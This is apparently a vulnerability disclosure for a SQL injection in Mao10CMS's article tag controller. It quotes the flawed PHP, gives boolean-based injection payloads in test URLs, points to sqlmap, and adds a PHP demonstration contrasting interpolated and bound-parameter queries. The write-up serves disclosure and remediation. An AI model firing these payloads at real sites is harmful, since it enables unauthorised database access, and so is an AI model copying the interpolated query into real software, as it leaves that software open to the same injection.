Mao10CMS SQL Injection
Vulnerability files:
Application\Article\Controller\IndexController.class.php

public function tag($tag, $page = 1) {
    if (is_numeric($page)) { // filter parameters
        $condition['type'] = 'Article';
        $date = strtotime("now");
        // $tag is inserted directly into the query string
        $args_id = M('meta')->where("meta_key = 'tag' AND meta_value = '$tag' AND type = 'basic'")->getField('page_id', true);
        $condition['id'] = array('in', $args_id);
        $this->page = M('page')->where($condition)->order('date desc')->page($page, mc_option('page_size'))->select();
        // because there is another statement here:
        $count = M('page')->where($condition)->count();
        $this->assign('id', $id);
        $this->assign('Count', $count);
        $this->assign('page_now', $page);
        $this->theme(mc_option('Theme'))->display('Article/termin');
    } else {
        $this->error('parameter error!');
    }
}
Local test URL:
http://127.0.0.1/index.php?m=article&c=index&a=tag&tag=%E4%BF%9D%E8%AF%81
True: http://127.0.0.1/index.php?m=article&c=index&a=tag&tag=%E4%BF%9D%E8%AF%81%27)%20and%201=1--%201
False: http://127.0.0.1/index.php?m=article&c=index&a=tag&tag=%E4%BF%9D%E8%AF%81%27)%20and%201=2--%201
You can use sqlmap directly.
Solution:
Escape the parameter:
addslashes(str)
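
The true/false behaviour above and a parameterized form of the same query, as an added example that is not part of the original write-up or of Mao10CMS: it uses PDO with an in-memory SQLite table (constructed data) instead of ThinkPHP and MySQL, and bound parameters rather than the addslashes() the page suggests. The function names and the parenthesised WHERE clause are assumptions.

```php
<?php
// Added example: constructed in-memory data, not Mao10CMS code.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE meta (page_id INTEGER, meta_key TEXT, meta_value TEXT, type TEXT)");
$db->exec("INSERT INTO meta VALUES (1, 'tag', '保证', 'basic'), (2, 'tag', '保证', 'basic'), (3, 'tag', 'other', 'basic')");

// Same shape as the page's where() string: $tag is interpolated into the SQL text.
// The wrapping parentheses are an assumption, matching the ")" in the page's test URLs.
function tagIdsInterpolated(PDO $db, string $tag): array
{
    $sql = "SELECT page_id FROM meta WHERE ( meta_key='tag' AND meta_value='$tag' AND type='basic' )";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Bound parameter: $tag travels as data and cannot alter the statement.
function tagIdsBound(PDO $db, string $tag): array
{
    $stmt = $db->prepare("SELECT page_id FROM meta WHERE ( meta_key='tag' AND meta_value=:tag AND type='basic' )");
    $stmt->execute([':tag' => $tag]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// URL-decoded tag values from the page's three test URLs.
$cases = [
    'plain' => '保证',
    'true'  => "保证') and 1=1-- 1",
    'false' => "保证') and 1=2-- 1",
];

foreach ($cases as $name => $tag) {
    printf("%-5s interpolated=%d rows, bound=%d rows\n",
        $name, count(tagIdsInterpolated($db, $tag)), count(tagIdsBound($db, $tag)));
}
```

With the interpolated query the "true" and "false" values return different row counts, which is the boolean signal the test URLs rely on; with the bound parameter both are treated as literal tag names and match nothing.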